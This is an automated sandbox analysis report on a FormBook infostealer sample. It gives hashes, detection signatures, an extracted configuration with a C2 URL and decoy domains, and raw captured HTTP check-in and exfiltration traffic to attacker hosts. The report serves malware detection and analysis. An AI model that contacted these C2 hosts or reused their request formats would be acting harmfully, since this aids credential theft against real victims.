Analysis Report MOe7vYpWXW.exe

Overview

General Information

Sample Name: MOe7vYpWXW.exe
Analysis ID: 404125
MD5: 106ada585df884b13cd6a8a71e404c78
SHA1: 470e8dd108972fe65c027b9d4856aa365b69fd9e
SHA256: 612d1888d98714893e69c4649a46a990c9c26367834d5be5afc05df15e913572
Tags: AgentTeslaexe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected FormBook malware
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000000.00000002.683105402.0000000003AD9000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.mvcsecrets.com/op9s/"], "decoy": ["uscoser.club", "gustrad.com", "sowftwer.com", "psychicpatrol.com", "lmouowgoaa.com", "riandmoara.com", "sushigardentogo.com", "cannabimall.com", "ecolodgesworld.com", "mysandboxcsp.com", "coxsmobility.com", "sfs-distribution.info", "tymict.com", "u-bahn.online", "chrisjohnsondrums.com", "comfyscoffee.com", "eastwoodlearningcenter.com", "a-authenticate.com", "greatroyalspices.com", "legalparaprofessionalonline.com", "cnn24.site", "servinguprichard.com", "kongtiaodz.com", "priminerw.com", "intrateknik.com", "arabiangulfgames.com", "berkona.com", "herbaquni.com", "aluarte.info", "wuxkfowev.icu", "digitalneeds.tech", "practisepractice.com", "upgradeindonesia.com", "designinject.com", "chinahousecoralville.com", "clubliakinder.com", "sialkot.city", "evgreen.fund", "crg-construction.com", "rikrakprod.com", "classsnk.com", "e-motionaligner.com", "beautyblissshops.com", "pickyourprice.club", "kraekratom.com", "digitexz.online", "drburcindemirel.com", "thisislisauser.com", "bridge-the-mind.net", "skincodemtblo.com", "elayathemodel.com", "reinboge.net", "banks-in-cambodia.com", "earthkeepforum.com", "vbyvictorious.com", "vyne.net", "bearring.info", "jndaohang.com", "iandautomation.com", "puteraizman.com", "earthlyangelshomecare.com", "jumlasx.xyz", "holdergear.com", "bmwsns.com"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\fendlKCsOIoiN.exe ReversingLabs: Detection: 27%
Multi AV Scanner detection for submitted file
Source: MOe7vYpWXW.exe Virustotal: Detection: 21% Perma Link
Source: MOe7vYpWXW.exe ReversingLabs: Detection: 27%
Yara detected FormBook
Source: Yara match File source: 00000000.00000002.683105402.0000000003AD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.733752861.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.919281681.0000000000E00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.918719322.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.733501638.00000000010A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.727145278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.919250262.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.MOe7vYpWXW.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.MOe7vYpWXW.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\fendlKCsOIoiN.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: MOe7vYpWXW.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 6.2.MOe7vYpWXW.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

barindex
Uses 32bit PE files
Source: MOe7vYpWXW.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: MOe7vYpWXW.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: systray.pdb source: MOe7vYpWXW.exe, 00000006.00000002.733899042.000000000114A000.00000004.00000020.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000002.930881315.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: systray.pdbGCTL source: MOe7vYpWXW.exe, 00000006.00000002.733899042.000000000114A000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP source: MOe7vYpWXW.exe, 00000006.00000002.733964378.00000000013E0000.00000040.00000001.sdmp, systray.exe, 0000000D.00000003.727048193.0000000000E80000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: MOe7vYpWXW.exe, systray.exe
Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000002.930881315.0000000005A00000.00000002.00000001.sdmp

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\MOe7vYpWXW.exe Code function: 4x nop then pop edi 6_2_00417D7C
Source: C:\Windows\SysWOW64\systray.exe Code function: 4x nop then pop edi 13_2_006F6CA1
Source: C:\Windows\SysWOW64\systray.exe Code function: 4x nop then pop edi 13_2_006F7D7C

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.mvcsecrets.com/op9s/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /op9s/?ATRlddL=fDbKJpNgWtWNAOf2zOowoHnuaPtf1JEer055tVKXYGTx+PWX8HxpnvRicLt6T6e26FCe&vjlP0v=UDHHm2vhQ0rxBNh HTTP/1.1Host: www.reinboge.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /op9s/?ATRlddL=xnspkmSPLBj08xNePaHPPsjxz908h8zfhpai7QtikNAo4s21U/7o4eKTODKz+4ENdtw2&vjlP0v=UDHHm2vhQ0rxBNh HTTP/1.1Host: www.riandmoara.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 98.124.204.16 98.124.204.16
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ENOMAS1US ENOMAS1US
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /op9s/ HTTP/1.1Host: www.reinboge.netConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.reinboge.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.reinboge.net/op9s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 52 6c 64 64 4c 3d 58 68 58 77 58 4f 63 51 53 74 69 53 56 5f 75 6c 72 71 35 37 39 51 37 61 55 63 56 53 33 39 4d 55 35 43 73 73 6f 46 36 6a 51 6e 48 32 76 4d 6d 4b 74 46 46 78 69 36 34 42 41 75 39 30 4a 35 71 55 32 55 32 55 4f 52 4b 66 79 56 55 64 35 6a 48 37 31 6a 58 70 32 79 77 69 43 79 51 69 61 4f 6e 6c 35 41 44 63 35 34 4d 4c 4c 36 4c 48 71 65 79 5f 42 68 4c 30 34 73 53 47 7e 56 6c 66 49 50 33 32 43 54 64 70 62 4e 45 64 53 69 41 4f 4d 2d 4a 2d 78 64 57 7a 79 44 48 50 28 4f 61 48 72 4c 57 47 4a 78 34 55 32 68 74 7a 67 76 7a 75 56 61 7e 4b 31 7a 28 61 77 53 78 47 49 36 51 37 7a 6a 35 51 30 36 5a 49 62 33 6f 72 7a 32 57 56 45 42 5a 75 65 67 6e 36 41 52 6d 4c 39 44 67 6a 4c 6b 6c 49 56 71 59 30 43 6d 28 77 6a 68 79 5f 49 76 49 6e 6c 46 6b 7a 38 45 6f 6b 30 59 66 42 50 44 38 42 45 73 48 48 67 38 54 52 66 45 64 57 52 62 66 74 61 66 35 5a 35 4b 32 70 43 4c 44 4a 77 59 31 76 77 39 58 32 55 63 46 6f 53 46 35 34 57 71 39 31 76 6c 44 57 44 69 67 63 6a 74 44 4a 4c 65 74 32 5a 39 54 51 38 49 4d 7a 36 54 77 37 77 30 58 47 32 4d 4f 70 4f 38 37 46 38 52 45 62 45 65 34 78 4a 62 33 64 64 30 56 75 43 32 76 4b 72 48 54 75 75 70 54 47 6e 53 66 71 48 37 39 77 63 39 34 37 72 30 49 41 7e 65 68 50 55 4b 65 62 6c 51 35 35 6a 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ATRlddL=XhXwXOcQStiSV_ulrq579Q7aUcVS39MU5CssoF6jQnH2vMmKtFFxi64BAu90J5qU2U2UORKfyVUd5jH71jXp2ywiCyQiaOnl5ADc54MLL6LHqey_BhL04sSG~VlfIP32CTdpbNEdSiAOM-J-xdWzyDHP(OaHrLWGJx4U2htzgvzuVa~K1z(awSxGI6Q7zj5Q06ZIb3orz2WVEBZuegn6ARmL9DgjLklIVqY0Cm(wjhy_IvInlFkz8Eok0YfBPD8BEsHHg8TRfEdWRbftaf5Z5K2pCLDJwY1vw9X2UcFoSF54Wq91vlDWDigcjtDJLet2Z9TQ8IMz6Tw7w0XG2MOpO87F8REbEe4xJb3dd0VuC2vKrHTuupTGnSfqH79wc947r0IA~ehPUKeblQ55jA).
Source: global traffic HTTP traffic detected: POST /op9s/ HTTP/1.1Host: www.reinboge.netConnection: closeContent-Length: 190377Cache-Control: no-cacheOrigin: http://www.reinboge.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.reinboge.net/op9s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 52 6c 64 64 4c 3d 58 68 58 77 58 4d 39 6e 65 39 6d 48 66 70 65 6f 71 36 70 4a 33 77 4c 32 5a 36 64 42 7e 4b 34 71 37 51 34 47 6f 46 4b 64 4c 54 69 37 7e 63 57 4b 36 58 64 38 72 36 34 4f 4c 4f 39 7a 4e 35 57 6f 31 43 7a 5a 4f 51 7e 31 79 56 4d 63 32 46 72 2d 30 7a 57 68 35 79 73 30 41 79 56 6b 61 49 6e 51 36 69 76 45 76 6f 41 4c 57 61 54 46 6d 66 6a 39 58 77 33 72 78 38 7e 44 79 30 4e 47 49 5f 4b 57 44 77 68 78 4b 49 63 62 56 56 38 48 51 4f 35 47 31 4d 4f 32 76 69 33 55 6d 35 79 59 6c 4b 62 4e 49 77 34 63 35 46 78 77 69 62 66 73 46 6f 32 43 7e 69 4c 6e 33 53 42 6f 49 39 4e 41 6e 42 39 38 7e 62 46 51 5a 6d 6c 38 30 30 36 58 4c 53 77 7a 61 6a 50 74 47 52 36 30 28 47 63 43 50 30 4a 6e 53 6f 68 5f 4d 6a 71 59 77 77 4f 7a 47 5f 34 70 6a 53 30 72 6d 67 55 4c 78 5a 48 57 55 44 63 4a 51 4b 6d 75 75 38 54 79 64 45 64 73 49 36 65 53 4e 4f 4e 6b 79 35 76 4c 43 4a 6a 61 75 59 49 2d 7a 37 57 64 4c 4d 31 6c 58 31 6c 4f 65 35 6c 6a 72 32 76 64 56 52 39 6a 71 4e 44 42 4c 63 55 34 5a 39 53 72 38 4e 30 5a 36 6d 67 37 68 31 32 61 77 71 47 66 49 38 36 64 36 41 30 5a 4e 4f 46 73 4a 62 28 64 63 45 46 49 54 51 4c 4b 34 45 4c 74 75 4e 48 47 33 53 66 71 62 37 38 4d 53 63 46 56 39 68 64 77 79 4e 6b 6a 55 64 6e 66 68 53 55 53 28 38 59 68 50 51 56 6a 43 77 70 55 38 5f 39 4d 47 71 75 57 56 63 6c 56 41 6a 6c 77 7a 77 79 35 35 56 52 61 61 79 71 43 48 49 28 4b 34 37 42 67 46 4e 54 57 54 72 6f 75 45 63 69 6a 70 74 4f 68 49 36 59 79 4d 77 65 7a 79 6e 6a 64 56 57 6c 4a 6d 7a 48 47 76 44 4f 79 6c 67 62 39 6a 65 6b 6e 4f 31 62 64 73 56 48 63 73 6e 6c 35 57 68 68 41 37 75 37 48 32 51 4a 41 4e 77 5a 77 33 30 61 50 45 36 33 69 64 75 72 6c 35 59 6e 75 47 64 4f 34 63 42 31 76 58 48 55 49 6a 74 4d 53 52 52 59 48 4b 4d 54 36 44 79 32 44 6e 70 6f 63 6e 37 4a 43 71 68 41 36 45 69 50 33 36 5f 36 63 37 4a 73 67 33 46 4b 6e 77 51 41 67 68 46 7a 70 62 62 7a 56 5a 77 4b 73 50 56 49 79 55 46 31 43 4a 73 44 42 6c 33 30 38 66 4c 72 71 66 4d 64 35 42 65 50 47 52 6f 76 6b 6c 35 69 4e 62 52 41 45 56 78 58 49 53 42 6b 74 59 66 44 6b 54 52 31 4e 43 6f 74 30 76 38 7a 71 59 59 6e 57 69 70 34 72 55 50 4d 4a 76 58 77 54 31 74 49 6f 6b 74 53 59 45 4b 72 47 52 58 64 4f 71 6d 70 4c 28 35 38 4e 52 49 4c 49 32 4b 5a 35 56 6d 41 30 39 7a 6a 56 62 52 6a 5f 66 35 4f 61 69 52 51 69 31 6b 6f 79 77 2d 41 67 53 46 37 37 5a 63 4f 6c 34 64 31 4c 28 63 4f 77 61 39 6e 46 55 61 41 4a 79 47 7e 4a 53 35 4d 62 62 67 73 6f 46 67 69 42 54 63 43 42 70 56 67 78 34 6d 76 62 77 59 4c 48 44 70 77 6d 34 4a 5a 4d 66 2d 4e 57 6e 69 4f 58 50 4c 45 46 47 62 36 30 52 72 7a 64 42 50 28 49 43 5a 58 4c 4f 33 72 52 31 46 30 55 5a 4e 54 36 72 70
Source: global traffic HTTP traffic detected: POST /op9s/ HTTP/1.1Host: www.riandmoara.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.riandmoara.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.riandmoara.com/op9s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 52 6c 64 64 4c 3d 35 46 67 54 36 44 53 59 41 79 36 44 6b 78 34 71 51 4e 4f 54 5a 49 58 4d 77 74 30 39 6f 75 7a 69 34 70 50 7a 6f 43 5a 2d 71 66 35 73 33 49 6d 76 57 50 71 75 6f 4b 37 7a 5a 52 36 35 6f 4b 45 34 52 65 4a 70 54 57 66 75 71 61 7e 61 77 31 4b 4c 6f 79 47 69 4a 52 7a 57 55 6c 44 4b 49 57 61 4f 42 49 64 7a 4c 31 33 38 76 49 73 64 4e 51 43 37 6f 56 65 74 4e 53 7e 4f 6d 48 53 66 56 61 39 2d 38 4d 62 6b 76 47 52 52 56 4a 75 6e 71 72 4f 36 32 34 63 47 77 36 47 43 42 77 33 6e 65 6e 79 54 57 55 76 78 42 66 32 65 44 5a 38 57 52 41 52 4b 6c 6f 47 65 4b 77 78 38 4b 77 50 44 76 6e 50 48 76 30 6f 75 78 76 48 6a 69 71 32 63 66 50 53 74 7e 54 6e 4d 54 4b 70 41 73 48 54 6d 44 64 78 35 44 6e 56 75 58 47 4d 58 33 34 76 68 46 79 6c 63 47 45 6e 56 56 5a 49 66 31 72 75 34 73 38 6d 4f 71 61 59 77 65 34 45 65 46 65 4c 77 30 46 50 62 78 55 74 41 4e 71 70 6f 62 35 35 54 4e 49 69 48 55 4b 44 58 6f 4f 69 78 4c 6d 58 43 67 42 4b 4d 48 45 28 6b 54 7a 30 67 58 4d 61 32 31 38 34 37 6f 52 41 44 7e 6b 65 36 5a 6b 62 36 55 50 64 71 69 2d 4d 30 38 54 50 33 31 71 6a 53 39 72 63 6d 6a 5f 65 47 4b 6a 38 76 35 34 37 62 51 4c 56 38 79 68 65 31 35 6c 47 77 57 74 65 64 68 44 63 32 68 62 64 70 4c 74 58 75 64 75 4a 4f 55 44 53 33 52 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ATRlddL=5FgT6DSYAy6Dkx4qQNOTZIXMwt09ouzi4pPzoCZ-qf5s3ImvWPquoK7zZR65oKE4ReJpTWfuqa~aw1KLoyGiJRzWUlDKIWaOBIdzL138vIsdNQC7oVetNS~OmHSfVa9-8MbkvGRRVJunqrO624cGw6GCBw3nenyTWUvxBf2eDZ8WRARKloGeKwx8KwPDvnPHv0ouxvHjiq2cfPSt~TnMTKpAsHTmDdx5DnVuXGMX34vhFylcGEnVVZIf1ru4s8mOqaYwe4EeFeLw0FPbxUtANqpob55TNIiHUKDXoOixLmXCgBKMHE(kTz0gXMa21847oRAD~ke6Zkb6UPdqi-M08TP31qjS9rcmj_eGKj8v547bQLV8yhe15lGwWtedhDc2hbdpLtXuduJOUDS3RQ).
Source: global traffic HTTP traffic detected: POST /op9s/ HTTP/1.1Host: www.riandmoara.comConnection: closeContent-Length: 190377Cache-Control: no-cacheOrigin: http://www.riandmoara.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.riandmoara.com/op9s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 52 6c 64 64 4c 3d 35 46 67 54 36 43 61 69 48 43 28 66 67 44 73 33 51 64 65 4c 50 38 72 65 36 4e 59 49 76 39 53 5a 6e 75 58 5a 6f 44 70 36 6a 39 41 31 39 49 32 76 55 4b 32 70 7a 61 37 30 4e 68 36 32 6a 71 49 32 54 4d 5a 66 54 58 4b 42 71 61 32 5a 6e 6e 53 43 6f 69 47 50 49 78 50 41 53 6c 6e 52 49 55 65 5f 41 71 78 52 65 46 7a 38 67 59 55 66 51 44 4c 76 28 67 75 63 4f 68 4b 48 71 69 47 38 57 71 51 4a 38 75 6e 38 35 56 56 54 48 73 75 67 6d 4c 53 43 6e 61 38 44 7e 4b 53 46 45 7a 4b 68 44 55 57 66 56 52 61 52 59 71 4f 52 41 70 30 59 61 51 67 33 7a 70 53 77 4c 68 41 4e 4b 78 58 39 6d 30 71 4a 34 6d 4e 6a 68 4b 76 46 71 2d 75 53 48 59 79 31 31 78 50 39 52 4c 35 76 6b 6a 58 35 45 4d 64 57 41 69 51 7a 5a 48 55 43 6b 38 66 74 4e 6a 55 70 42 54 28 4e 4b 4b 42 39 79 74 75 72 6d 50 75 57 36 49 30 43 61 6f 45 31 48 65 4c 6b 37 6e 6e 6a 67 41 64 61 47 61 5a 56 62 34 68 4d 51 4c 58 63 58 50 62 78 69 4c 43 30 48 32 72 30 30 43 53 43 4d 32 54 76 44 41 6f 41 62 73 61 6c 31 5f 51 67 6f 52 41 78 7e 6d 32 63 5a 57 6e 36 55 64 56 44 6c 65 77 4f 74 44 4f 33 37 61 54 55 7a 37 77 32 6a 2d 32 47 45 79 4e 41 35 4c 72 62 55 5a 4e 7a 79 45 71 31 77 46 47 77 43 64 66 5f 6c 47 6c 6e 68 35 51 66 61 73 6e 47 64 49 31 51 61 79 6a 37 4c 67 74 55 55 58 6a 45 77 41 34 2d 52 7a 6b 74 79 66 5a 37 76 36 79 74 79 65 52 32 6f 45 57 6f 70 4c 4e 4d 36 74 72 34 39 34 73 42 50 38 57 53 6c 6d 6d 36 32 48 6b 71 58 32 37 66 4c 42 79 65 75 34 74 36 62 6a 68 43 48 73 38 71 47 2d 67 59 77 68 44 65 77 39 69 32 39 76 28 55 4f 4c 44 54 45 6a 62 4e 33 58 43 5f 67 4e 4c 38 39 51 69 51 68 77 71 71 6d 30 70 4b 56 64 64 51 31 53 6c 64 51 4e 71 5f 4c 71 41 74 6b 79 77 51 32 44 42 34 79 42 53 70 34 73 34 59 58 55 55 58 75 49 6d 5a 66 70 6e 4f 74 45 32 45 72 42 31 4f 4a 6b 4e 62 75 6f 28 35 43 54 49 66 67 31 67 43 69 48 67 6e 33 4e 4e 45 7a 32 4f 57 5a 6c 34 79 64 77 63 6b 54 31 53 34 4b 56 6a 43 4d 59 45 77 45 74 68 58 57 52 54 35 76 32 6a 7a 34 62 6e 38 51 75 75 47 67 62 32 4a 50 39 6b 55 54 6b 73 33 38 6f 52 78 4c 6a 57 58 5a 41 4c 57 73 38 76 6f 66 48 6c 79 69 79 72 48 67 78 43 74 71 31 47 6e 54 2d 71 6d 51 2d 7a 76 4a 65 50 44 6b 4b 7a 74 51 74 36 63 4f 44 6e 6b 49 46 4d 56 34 57 32 59 32 71 52 42 7e 5f 6e 71 63 78 78 69 34 6c 39 67 71 59 76 79 78 66 72 5a 7a 59 6c 69 65 79 79 69 69 66 56 57 71 4f 76 4c 7e 77 4f 39 33 66 47 59 64 4d 58 47 37 57 39 7a 56 71 47 32 50 64 35 4c 6a 53 37 65 67 4c 69 76 53 6f 4f 5f 77 5a 36 75 53 52 7a 61 37 6d 69 6e 44 62 6f 4e 28 52 68 32 33 51 6a 55 37 35 47 55 76 43 43 56 61 59 48 35 75 79 49 4a 59 37 49 46 6e 61 4d 77 4b 48 49 58 6c 74 70 6d 7a 68 31 32 30 6b 41 4e
Source: global traffic HTTP traffic detected: GET /op9s/?ATRlddL=fDbKJpNgWtWNAOf2zOowoHnuaPtf1JEer055tVKXYGTx+PWX8HxpnvRicLt6T6e26FCe&vjlP0v=UDHHm2vhQ0rxBNh HTTP/1.1Host: www.reinboge.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /op9s/?ATRlddL=xnspkmSPLBj08xNePaHPPsjxz908h8zfhpai7QtikNAo4s21U/7o4eKTODKz+4ENdtw2&vjlP0v=UDHHm2vhQ0rxBNh HTTP/1.1Host: www.riandmoara.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: www.reinboge.net
Source: unknown HTTP traffic detected: POST /op9s/ HTTP/1.1Host: www.reinboge.netConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.reinboge.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.reinboge.net/op9s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 52 6c 64 64 4c 3d 58 68 58 77 58 4f 63 51 53 74 69 53 56 5f 75 6c 72 71 35 37 39 51 37 61 55 63 56 53 33 39 4d 55 35 43 73 73 6f 46 36 6a 51 6e 48 32 76 4d 6d 4b 74 46 46 78 69 36 34 42 41 75 39 30 4a 35 71 55 32 55 32 55 4f 52 4b 66 79 56 55 64 35 6a 48 37 31 6a 58 70 32 79 77 69 43 79 51 69 61 4f 6e 6c 35 41 44 63 35 34 4d 4c 4c 36 4c 48 71 65 79 5f 42 68 4c 30 34 73 53 47 7e 56 6c 66 49 50 33 32 43 54 64 70 62 4e 45 64 53 69 41 4f 4d 2d 4a 2d 78 64 57 7a 79 44 48 50 28 4f 61 48 72 4c 57 47 4a 78 34 55 32 68 74 7a 67 76 7a 75 56 61 7e 4b 31 7a 28 61 77 53 78 47 49 36 51 37 7a 6a 35 51 30 36 5a 49 62 33 6f 72 7a 32 57 56 45 42 5a 75 65 67 6e 36 41 52 6d 4c 39 44 67 6a 4c 6b 6c 49 56 71 59 30 43 6d 28 77 6a 68 79 5f 49 76 49 6e 6c 46 6b 7a 38 45 6f 6b 30 59 66 42 50 44 38 42 45 73 48 48 67 38 54 52 66 45 64 57 52 62 66 74 61 66 35 5a 35 4b 32 70 43 4c 44 4a 77 59 31 76 77 39 58 32 55 63 46 6f 53 46 35 34 57 71 39 31 76 6c 44 57 44 69 67 63 6a 74 44 4a 4c 65 74 32 5a 39 54 51 38 49 4d 7a 36 54 77 37 77 30 58 47 32 4d 4f 70 4f 38 37 46 38 52 45 62 45 65 34 78 4a 62 33 64 64 30 56 75 43 32 76 4b 72 48 54 75 75 70 54 47 6e 53 66 71 48 37 39 77 63 39 34 37 72 30 49 41 7e 65 68 50 55 4b 65 62 6c 51 35 35 6a 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ATRlddL=XhXwXOcQStiSV_ulrq579Q7aUcVS39MU5CssoF6jQnH2vMmKtFFxi64BAu90J5qU2U2UORKfyVUd5jH71jXp2ywiCyQiaOnl5ADc54MLL6LHqey_BhL04sSG~VlfIP32CTdpbNEdSiAOM-J-xdWzyDHP(OaHrLWGJx4U2htzgvzuVa~K1z(awSxGI6Q7zj5Q06ZIb3orz2WVEBZuegn6ARmL9DgjLklIVqY0Cm(wjhy_IvInlFkz8Eok0YfBPD8BEsHHg8TRfEdWRbftaf5Z5K2pCLDJwY1vw9X2UcFoSF54Wq91vlDWDigcjtDJLet2Z9TQ8IMz6Tw7w0XG2MOpO87F8REbEe4xJb3dd0VuC2vKrHTuupTGnSfqH79wc947r0IA~ehPUKeblQ55jA).
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Tue, 04 May 2021 16:25:55 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 